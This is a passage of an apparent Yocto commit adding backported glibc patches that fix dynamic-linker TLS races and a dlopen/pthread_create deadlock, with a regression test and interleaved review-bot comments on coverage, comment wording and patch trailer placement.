24Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce]
25Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase.
26Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
27Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
28---
29diff --git a/elf/Makefile b/elf/Makefile
30index d3e909637a..3241cb6046 100644
31--- a/elf/Makefile
32+++ b/elf/Makefile
33@@ -201,7 +201,7 @@
34 tst-unwind-ctor tst-unwind-main tst-audit13 \
35 tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \
36 tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \
37- tst-dlopenfail-2
38+ tst-dlopenfail-2 tst-tls21
39 # reldep9
40 tests-internal += loadtest unload unload2 circleload1 \
41 neededtest neededtest2 neededtest3 neededtest4 \
42@@ -312,7 +312,7 @@
43 tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \
44 tst-initlazyfailmod tst-finilazyfailmod \
45 tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \
46- tst-dlopenfailmod3 tst-ldconfig-ld-mod
47+ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod
48 # Most modules build with _ISOMAC defined, but those filtered out
49 # depend on internal headers.
50 modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\
51@@ -1697,5 +1697,10 @@
52 $(objpfx)tst-dlopen-nodelete-reloc-mod16.so
53 LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed
54
55+# Reuses tst-tls-many-dynamic-modules
56+$(objpfx)tst-tls21: $(libdl) $(shared-thread-library)
57+$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so
58+$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so)
59+
60 $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so
61 $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl)
62diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c
63new file mode 100644
64index 0000000000..560bf5813a
65--- /dev/null
66+++ b/elf/tst-tls21.c
67@@ -0,0 +1,68 @@
68+/* Test concurrent dlopen and pthread_create: BZ 19329.
69+ Copyright (C) 2021 Free Software Foundation, Inc.
70+ This file is part of the GNU C Library.
71+
72+ The GNU C Library is free software; you can redistribute it and/or
73+ modify it under the terms of the GNU Lesser General Public
74+ License as published by the Free Software Foundation; either
75+ version 2.1 of the License, or (at your option) any later version.
76+
77+ The GNU C Library is distributed in the hope that it will be useful,
78+ but WITHOUT ANY WARRANTY; without even the implied warranty of
79+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
80+ Lesser General Public License for more details.
81+
82+ You should have received a copy of the GNU Lesser General Public
83+ License along with the GNU C Library; if not, see
84+ <http://www.gnu.org/licenses/>. */
85+
86+#include <dlfcn.h>
87+#include <pthread.h>
88+#include <stdio.h>
89+#include <stdatomic.h>
90+#include <support/xdlfcn.h>
91+#include <support/xthread.h>
92+
93+#define THREADS 10000
94+
95+static atomic_int done;
96+
97+static void *
98+start (void *a)
99+{
100+ /* Load a module with many dependencies that each have TLS. */
101+ xdlopen ("tst-tls21mod.so", RTLD_LAZY);
102+ atomic_store_explicit (&done, 1, memory_order_release);
103+ return 0;
104+}
105+
106+static void *
107+nop (void *a)
108+{
109+ return 0;
110+}
111+
112+static int
113+do_test (void)
114+{
115+ pthread_t t1, t2;
116+ int i;
117+
118+ /* Load a module with lots of dependencies and TLS. */
119+ t1 = xpthread_create (0, start, 0);
120+
121+ /* Concurrently create lots of threads until dlopen is observably done. */
122+ for (i = 0; i < THREADS; i++)
123+ {
124+ if (atomic_load_explicit (&done, memory_order_acquire) != 0)
125+ break;
126+ t2 = xpthread_create (0, nop, 0);
127+ xpthread_join (t2);
128+ }
129+
130+ xpthread_join (t1);
131+ printf ("threads created during dlopen: %d\n", i);
132+ return 0;
133+}
134+
135+#include <support/test-driver.c>
136diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c
137new file mode 100644
138index 0000000000..206ece4fb3
139--- /dev/null
140+++ b/elf/tst-tls21mod.c
141@@ -0,0 +1 @@
142+int __thread x;
143--
1442.27.0
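Review bot: `do_test` in tst-tls21.c returns 0 regardless of how many threads were created, so a run in which `xdlopen` completes before the first `xpthread_create (0, nop, 0)` leaves `i == 0` and passes without exercising the race the test exists for. The commit message already notes that the count depends on filesystem speed and hardware. I would record that limit next to the final `printf`, e.g. `/* i == 0 means no thread creation overlapped dlopen; such a run does not exercise BZ 19329. */`, so a low count in the log is not read as coverage.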
diff --git a/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
new file mode 100644
index 0000000000..a87afe3230
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
@@ -0,0 +1,180 @@
1From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001
2From: Adhemerval Zanella <adhemerval.zanella@linaro.org>
3Date: Fri, 25 Jun 2021 10:54:12 -0300
4Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135)
5
6This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2)
7that fixes the _dl_next_tls_modid issues.
8
9This issue with 572bd547d57a patch is the DTV entry will be only
10update on dl_open_worker() with the update_tls_slotinfo() call after
11all dependencies are being processed by _dl_map_object_deps(). However
12_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since
13the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be
14wrongly reused.
15
16This patch fixes by renaming the _dl_next_tls_modid() function to
17_dl_assign_tls_modid() and by passing the link_map so it can set
18the slotinfo value so a subsequente _dl_next_tls_modid() call will
19see the entry as allocated.
20
21The intermediary value is cleared up on remove_slotinfo() for the case
22a library fails to load with RTLD_NOW.
23
24This patch fixes BZ #27135.
25
26Checked on x86_64-linux-gnu.
27
28Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com>
29---
30 elf/dl-close.c | 8 +-
31 elf/dl-load.c | 2 +-
32 elf/dl-open.c | 10 --
33 elf/dl-tls.c | 17 +--
34 elf/rtld.c | 2 +-
35 sysdeps/generic/ldsodefs.h | 4 +-
36 6 files changed, 349 insertions(+), 33 deletions(-)
37---
38Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce]
39Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed.
40Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
41Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
42---
43diff --git a/elf/dl-close.c b/elf/dl-close.c
44index 3720e47dd1..f39001cab9 100644
45--- a/elf/dl-close.c
46+++ b/elf/dl-close.c
47@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
48 object that wasn't fully set up. */
49 if (__glibc_likely (old_map != NULL))
50 {
51- assert (old_map->l_tls_modid == idx);
52-
53 /* Mark the entry as unused. These can be read concurrently. */
54 atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
55 GL(dl_tls_generation) + 1);
56@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
57 /* If this is not the last currently used entry no need to look
58 further. */
59 if (idx != GL(dl_tls_max_dtv_idx))
60- return true;
61+ {
62+ /* There is an unused dtv entry in the middle. */
63+ GL(dl_tls_dtv_gaps) = true;
64+ return true;
65+ }
66 }
67
68 while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0))
69diff --git a/elf/dl-load.c b/elf/dl-load.c
70index a08df001af..650e4edc35 100644
71--- a/elf/dl-load.c
72+++ b/elf/dl-load.c
73@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires");
74 not set up TLS data structures, so don't use them now. */
75 || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL)))
76 /* Assign the next available module ID. */
77- l->l_tls_modid = _dl_next_tls_modid ();
78+ _dl_assign_tls_modid (l);
79
80 #ifdef DL_AFTER_LOAD
81 DL_AFTER_LOAD (l);
82diff --git a/elf/dl-open.c b/elf/dl-open.c
83index a066f39bd0..d2240d8747 100644
84--- a/elf/dl-open.c
85+++ b/elf/dl-open.c
86@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()"));
87 state if relocation failed, for example. */
88 if (args.map)
89 {
90- /* Maybe some of the modules which were loaded use TLS.
91- Since it will be removed in the following _dl_close call
92- we have to mark the dtv array as having gaps to fill the
93- holes. This is a pessimistic assumption which won't hurt
94- if not true. There is no need to do this when we are
95- loading the auditing DSOs since TLS has not yet been set
96- up. */
97- if ((mode & __RTLD_AUDIT) == 0)
98- GL(dl_tls_dtv_gaps) = true;
99-
100 _dl_close_worker (args.map, true);
101
102 /* All l_nodelete_pending objects should have been deleted
103diff --git a/elf/dl-tls.c b/elf/dl-tls.c
104index 2b5161d10a..423e380f7c 100644
105--- a/elf/dl-tls.c
106+++ b/elf/dl-tls.c
107@@ -126,8 +126,8 @@ oom (void)
108 }
109
110
111-size_t
112-_dl_next_tls_modid (void)
113+void
114+_dl_assign_tls_modid (struct link_map *l)
115 {
116 size_t result;
117
118@@ -157,7 +157,11 @@ _dl_next_tls_modid (void)
119 }
120
121 if (result - disp < runp->len)
122- break;
123+ {
124+ /* Mark the entry as used, so any dependency see it. */
125+ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l);
126+ break;
127+ }
128
129 disp += runp->len;
130 }
131@@ -184,17 +188,14 @@ _dl_next_tls_modid (void)
132 atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
133 }
134
135- return result;
136+ l->l_tls_modid = result;
137 }
138
139
140 size_t
141 _dl_count_modids (void)
142 {
143- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where
144- we fail to load a module and unload it leaving a gap. If we don't
145- have gaps then the number of modids is the current maximum so
146- return that. */
147+ /* The count is the max unless dlclose or failed dlopen created gaps. */
148 if (__glibc_likely (!GL(dl_tls_dtv_gaps)))
149 return GL(dl_tls_max_dtv_idx);
150
151diff --git a/elf/rtld.c b/elf/rtld.c
152index e3fb2a5b2a..d733359eaf 100644
153--- a/elf/rtld.c
154+++ b/elf/rtld.c
155@@ -1612,7 +1612,7 @@
156 /* Add the dynamic linker to the TLS list if it also uses TLS. */
157 if (GL(dl_rtld_map).l_tls_blocksize != 0)
158 /* Assign a module ID. Do this before loading any audit modules. */
159- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid ();
160+ _dl_assign_tls_modid (&GL(dl_rtld_map));
161
162 /* If we have auditing DSOs to load, do it now. */
163 bool need_security_init = true;
164diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
165index 176394de4d..9c15259236 100644
166--- a/sysdeps/generic/ldsodefs.h
167+++ b/sysdeps/generic/ldsodefs.h
168@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr,
169 extern void _dl_sysdep_start_cleanup (void) attribute_hidden;
170
171
172-/* Determine next available module ID. */
173-extern size_t _dl_next_tls_modid (void) attribute_hidden;
174+/* Determine next available module ID and set the L l_tls_modid. */
175+extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden;
176
177 /* Count the modules with TLS segments. */
178 extern size_t _dl_count_modids (void) attribute_hidden;
179--
1802.27.0
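Review bot: The updated comment in ldsodefs.h, `/* Determine next available module ID and set the L l_tls_modid. */`, leaves out the side effect that is the point of the fix: when a gap is reused, `_dl_assign_tls_modid` also stores `l` into `runp->slotinfo[result - disp].map`. I would reword it to something like `/* Assign the next available TLS module ID to L; when a gap is reused, also record L in that slotinfo entry so later calls see it as taken. */`. The backport header says the test hunks were removed, so this fix arrives without its regression test. The diffstat kept in the patch (349 insertions) no longer matches the six small hunks that remain. `_dl_assign_tls_modid` continues outside the hunks shown.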
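--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,56 @@
+From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:29:23 +0000
+Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to
+relocate tlsdesc lazily, but that does not work in a BIND_NOW module
+due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at
+load time fixes this bug 27721 too.
+---
+ sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h
+index 103eee6c3f..9a876a371e 100644
+--- a/sysdeps/x86_64/dl-machine.h
++++ b/sysdeps/x86_64/dl-machine.h
+@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map,
+ }
+ else if (__glibc_likely (r_type == R_X86_64_TLSDESC))
+ {
+- struct tlsdesc volatile * __attribute__((__unused__)) td =
+- (struct tlsdesc volatile *)reloc_addr;
++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++ const ElfW (Sym) *sym = &symtab[symndx];
++ const struct r_found_version *version = NULL;
+
+- td->arg = (void*)reloc;
+- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)])
+- + map->l_addr);
++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++ {
++ const ElfW (Half) *vernum =
++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++ version = &map->l_versions[vernum[symndx] & 0x7fff];
++ }
++
++ /* Always initialize TLS descriptors completely at load time, in
++ case static TLS is allocated for it that requires locking. */
++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+ }
+ else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE))
+ {
+--
+2.27.0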
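Review bot: The `Upstream-Status:` and `Signed-off-by:` trailers in this patch header sit after the first `---` and the diffstat, and 0036 and 0037 in this commit are laid out the same way. `git am` treats the text between the first `---` and the diff as notes rather than commit message, so applying and regenerating the patch (for example during a devtool refresh) would likely drop the backport provenance and the sign-offs. Moving those three lines directly under the commit message, above the first `---`, keeps them attached to the commit and removes the need for the second `---` separator. The code change itself is confined to the `R_X86_64_TLSDESC` branch of `elf_machine_lazy_rel`, whose body starts and ends outside the inner hunk.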
diff --git a/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..ad0a1147aa
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,124 @@
1From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Thu, 11 Feb 2021 11:40:11 +0000
4Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137]
5
6Lazy tlsdesc relocation is racy because the static tls optimization and
7tlsdesc management operations are done without holding the dlopen lock.
8
9This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
10for aarch64, but it fixes a different race: bug 27137.
11
12On i386 the code is a bit more complicated than on x86_64 because both
13rel and rela relocs are supported.
14---
15 sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++---------------------
16 1 file changed, 34 insertions(+), 42 deletions(-)
17---
18Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d]
19Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
20Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
21---
22diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h
23index 23e9cc3bfb..590b41d8d7 100644
24--- a/sysdeps/i386/dl-machine.h
25+++ b/sysdeps/i386/dl-machine.h
26@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map,
27 }
28 else if (__glibc_likely (r_type == R_386_TLS_DESC))
29 {
30- struct tlsdesc volatile * __attribute__((__unused__)) td =
31- (struct tlsdesc volatile *)reloc_addr;
32-
33- /* Handle relocations that reference the local *ABS* in a simple
34- way, so as to preserve a potential addend. */
35- if (ELF32_R_SYM (reloc->r_info) == 0)
36- td->entry = _dl_tlsdesc_resolve_abs_plus_addend;
37- /* Given a known-zero addend, we can store a pointer to the
38- reloc in the arg position. */
39- else if (td->arg == 0)
40- {
41- td->arg = (void*)reloc;
42- td->entry = _dl_tlsdesc_resolve_rel;
43- }
44- else
45- {
46- /* We could handle non-*ABS* relocations with non-zero addends
47- by allocating dynamically an arg to hold a pointer to the
48- reloc, but that sounds pointless. */
49- const Elf32_Rel *const r = reloc;
50- /* The code below was borrowed from elf_dynamic_do_rel(). */
51- const ElfW(Sym) *const symtab =
52- (const void *) D_PTR (map, l_info[DT_SYMTAB]);
53+ const Elf32_Rel *const r = reloc;
54+ /* The code below was borrowed from elf_dynamic_do_rel(). */
55+ const ElfW(Sym) *const symtab =
56+ (const void *) D_PTR (map, l_info[DT_SYMTAB]);
57
58+ /* Always initialize TLS descriptors completely at load time, in
59+ case static TLS is allocated for it that requires locking. */
60 # ifdef RTLD_BOOTSTRAP
61- /* The dynamic linker always uses versioning. */
62- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
63+ /* The dynamic linker always uses versioning. */
64+ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
65 # else
66- if (map->l_info[VERSYMIDX (DT_VERSYM)])
67+ if (map->l_info[VERSYMIDX (DT_VERSYM)])
68 # endif
69- {
70- const ElfW(Half) *const version =
71- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
72- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
73- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
74- &map->l_versions[ndx],
75- (void *) (l_addr + r->r_offset), skip_ifunc);
76- }
77+ {
78+ const ElfW(Half) *const version =
79+ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
80+ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
81+ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
82+ &map->l_versions[ndx],
83+ (void *) (l_addr + r->r_offset), skip_ifunc);
84+ }
85 # ifndef RTLD_BOOTSTRAP
86- else
87- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
88- (void *) (l_addr + r->r_offset), skip_ifunc);
89+ else
90+ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
91+ (void *) (l_addr + r->r_offset), skip_ifunc);
92 # endif
93- }
94 }
95 else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
96 {
97@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map,
98 ;
99 else if (__glibc_likely (r_type == R_386_TLS_DESC))
100 {
101- struct tlsdesc volatile * __attribute__((__unused__)) td =
102- (struct tlsdesc volatile *)reloc_addr;
103+ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
104+ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
105+ const ElfW (Sym) *sym = &symtab[symndx];
106+ const struct r_found_version *version = NULL;
107+
108+ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
109+ {
110+ const ElfW (Half) *vernum =
111+ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
112+ version = &map->l_versions[vernum[symndx] & 0x7fff];
113+ }
114
115- td->arg = (void*)reloc;
116- td->entry = _dl_tlsdesc_resolve_rela;
117+ /* Always initialize TLS descriptors completely at load time, in
118+ case static TLS is allocated for it that requires locking. */
119+ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
120 }
121 else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
122 {
123--
1242.27.0
diff --git a/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
new file mode 100644
index 0000000000..7a10131bad
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
@@ -0,0 +1,276 @@
1From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 15 Sep 2021 15:16:19 +0100
4Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ
5 #28357]
6
7The fix for bug 19329 caused a regression such that pthread_create can
8deadlock when concurrent ctors from dlopen are waiting for it to finish.
9Use a new GL(dl_load_tls_lock) in pthread_create that is not taken
10around ctors in dlopen.
11
12The new lock is also used in __tls_get_addr instead of GL(dl_load_lock).
13
14The new lock is held in _dl_open_worker and _dl_close_worker around
15most of the logic before/after the init/fini routines. When init/fini
16routines are running then TLS is in a consistent, usable state.
17In _dl_open_worker the new lock requires catching and reraising dlopen
18failures that happen in the critical section.
19
20The new lock is reinitialized in a fork child, to keep the existing
21behaviour and it is kept recursive in case malloc interposition or TLS
22access from signal handlers can retake it. It is not obvious if this
23is necessary or helps, but avoids changing the preexisting behaviour.
24
25The new lock may be more appropriate for dl_iterate_phdr too than
26GL(dl_load_write_lock), since TLS state of an incompletely loaded
27module may be accessed. If the new lock can replace the old one,
28that can be a separate change.
29
30Fixes bug 28357.
31
32Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
33---
34 elf/dl-close.c | 6 ++
35 elf/dl-open.c | 35 ++++++++-
36 elf/dl-support.c | 7 ++
37 elf/dl-tls.c | 16 ++---
38 elf/rtld.c | 1 +
39 sysdeps/nptl/fork.c | 3 +
40 sysdeps/generic/ldsodefs.h | 9 ++-
41 10 files changed, 235 insertions(+), 12 deletions(-)
42---
43Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5]
44Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case.
45Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
46Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
47---
48diff --git a/elf/dl-close.c b/elf/dl-close.c
49index 93ff5c96e9..cfe0f1c0c9 100644
50--- a/elf/dl-close.c
51+++ b/elf/dl-close.c
52@@ -551,6 +551,9 @@
53 size_t tls_free_end;
54 tls_free_start = tls_free_end = NO_TLS_OFFSET;
55
56+ /* Protects global and module specitic TLS state. */
57+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
58+
59 /* We modify the list of loaded objects. */
60 __rtld_lock_lock_recursive (GL(dl_load_write_lock));
61
62@@ -786,6 +789,9 @@
63 GL(dl_tls_static_used) = tls_free_start;
64 }
65
66+ /* TLS is cleaned up for the unloaded modules. */
67+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
68+
69 #ifdef SHARED
70 /* Auditing checkpoint: we have deleted all objects. */
71 if (__glibc_unlikely (do_audit))
72diff --git a/elf/dl-open.c b/elf/dl-open.c
73index 5295e931b0..6ea5dd2457 100644
74--- a/elf/dl-open.c
75+++ b/elf/dl-open.c
76@@ -57,6 +57,9 @@
77 (non-negative). */
78 unsigned int original_global_scope_pending_adds;
79
80+ /* Set to true if the end of dl_open_worker_begin was reached. */
81+ bool worker_continue;
82+
83 /* Original parameters to the program and the current environment. */
84 int argc;
85 char **argv;
86@@ -473,7 +473,7 @@
87 }
88
89 static void
90-dl_open_worker (void *a)
91+dl_open_worker_begin (void *a)
92 {
93 struct dl_open_args *args = a;
94 const char *file = args->file;
95@@ -747,6 +747,36 @@
96 if (mode & RTLD_GLOBAL)
97 add_to_global_resize (new);
98
99+ args->worker_continue = true;
100+}
101+
102+static void
103+dl_open_worker (void *a)
104+{
105+ struct dl_open_args *args = a;
106+
107+ args->worker_continue = false;
108+
109+ {
110+ /* Protects global and module specific TLS state. */
111+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
112+
113+ struct dl_exception ex;
114+ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args);
115+
116+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
117+
118+ if (__glibc_unlikely (ex.errstring != NULL))
119+ /* Reraise the error. */
120+ _dl_signal_exception (err, &ex, NULL);
121+ }
122+
123+ if (!args->worker_continue)
124+ return;
125+
126+ int mode = args->mode;
127+ struct link_map *new = args->map;
128+
129 /* Run the initializer functions of new objects. Temporarily
130 disable the exception handler, so that lazy binding failures are
131 fatal. */
132diff --git a/elf/dl-support.c b/elf/dl-support.c
133index 02e2ed72f5..d99c1f1d62 100644
134--- a/elf/dl-support.c
135+++ b/elf/dl-support.c
136@@ -219,6 +219,13 @@
137 list of loaded objects while an object is added to or removed from
138 that list. */
139 __rtld_lock_define_initialized_recursive (, _dl_load_write_lock)
140+/* This lock protects global and module specific TLS related data.
141+ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
142+ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
143+ accessed and when TLS related relocations are processed for a
144+ module. It was introduced to keep pthread_create accessing TLS
145+ state that is being set up. */
146+__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock)
147
148
149 #ifdef HAVE_AUX_VECTOR
150diff --git a/elf/dl-tls.c b/elf/dl-tls.c
151index d554ae4497..9260d2d696 100644
152--- a/elf/dl-tls.c
153+++ b/elf/dl-tls.c
154@@ -443,7 +443,7 @@
155 size_t maxgen = 0;
156
157 /* Protects global dynamic TLS related state. */
158- __rtld_lock_lock_recursive (GL(dl_load_lock));
159+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
160
161 /* Check if the current dtv is big enough. */
162 if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
163@@ -517,7 +517,7 @@
164 listp = listp->next;
165 assert (listp != NULL);
166 }
167- __rtld_lock_unlock_recursive (GL(dl_load_lock));
168+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
169
170 /* The DTV version is up-to-date now. */
171 dtv[0].counter = maxgen;
172@@ -656,7 +656,7 @@
173
174 Here the dtv needs to be updated to new_gen generation count.
175
176- This code may be called during TLS access when GL(dl_load_lock)
177+ This code may be called during TLS access when GL(dl_load_tls_lock)
178 is not held. In that case the user code has to synchronize with
179 dlopen and dlclose calls of relevant modules. A module m is
180 relevant if the generation of m <= new_gen and dlclose of m is
181@@ -778,11 +778,11 @@
182 if (__glibc_unlikely (the_map->l_tls_offset
183 != FORCED_DYNAMIC_TLS_OFFSET))
184 {
185- __rtld_lock_lock_recursive (GL(dl_load_lock));
186+ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
187 if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET))
188 {
189 the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET;
190- __rtld_lock_unlock_recursive (GL(dl_load_lock));
191+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
192 }
193 else if (__glibc_likely (the_map->l_tls_offset
194 != FORCED_DYNAMIC_TLS_OFFSET))
195@@ -794,7 +794,7 @@
196 #else
197 # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined"
198 #endif
199- __rtld_lock_unlock_recursive (GL(dl_load_lock));
200+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
201
202 dtv[GET_ADDR_MODULE].pointer.to_free = NULL;
203 dtv[GET_ADDR_MODULE].pointer.val = p;
204@@ -802,7 +802,7 @@
205 return (char *) p + GET_ADDR_OFFSET;
206 }
207 else
208- __rtld_lock_unlock_recursive (GL(dl_load_lock));
209+ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
210 }
211 struct dtv_pointer result = allocate_and_init (the_map);
212 dtv[GET_ADDR_MODULE].pointer = result;
213@@ -873,7 +873,7 @@
214 return NULL;
215
216 dtv_t *dtv = THREAD_DTV ();
217- /* This may be called without holding the GL(dl_load_lock). Reading
218+ /* This may be called without holding the GL(dl_load_tls_lock). Reading
219 arbitrary gen value is fine since this is best effort code. */
220 size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
221 if (__glibc_unlikely (dtv[0].counter != gen))
222diff --git a/elf/rtld.c b/elf/rtld.c
